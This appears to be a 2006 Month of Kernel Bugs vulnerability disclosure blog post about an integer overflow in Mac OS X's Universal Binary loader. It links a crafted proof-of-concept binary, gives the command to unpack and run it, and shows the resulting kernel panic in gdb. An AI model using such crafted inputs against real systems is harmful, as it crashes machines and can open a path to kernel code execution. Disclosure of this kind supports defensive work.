Sunday, 26 November 2006

Mac OS X Universal Binary Loading Memory Corruption

Vendor:: Mac
Application:: OS X
Disclosed:: 26-11-06
Description:: Mac OS X fails to properly handle corrupted Universal Binaries, leading to an exploitable memory corruption condition with potential risk of kernel-mode arbitrary code execution. This particular vulnerability is caused by an integer overflow in the fatfile_getarch2() function. Local unprivileged users can abuse this issue with specially crafted Mach-O 'Universal' binaries.
Author:: LMH - discovery, MoKB release, debugging.
Exploit:: The following Mach-O 'Universal' binary can be used to reproduce the bug: MOKB-26-11-2006.bz2
bunzip2 MOKB-26-11-2006.bz2 && ./MOKB-26-11-2006

yssupstae:/tmp evets$ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-79aa141d
GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006)

[...]
This GDB was configured as "i386-apple-darwin"...
#0 Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770
Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines.
(gdb) source /Volumes/KernelDebugKit/kgmacros
Loading Kernel GDB Macros package. Type "help kgm" for more info.
(gdb) paniclog
panic(cpu 0 caller 0x001A3135): Unresolved kernel trap (CPU 0, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x2524200c, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x3fffff35, ECX: 0x40000002, EDX: 0x00000000
CR2: 0x2524200c, EBP: 0x13fcb8a8, ESI: 0x2524200c, EDI: 0x00ffffff
EFL: 0x00010206, EIP: 0x00369de4, CS: 0x00000004, DS: 0x02ec000c

MORE...

Links::
Mac OS X ABI Mach-O File Format Reference

No comments: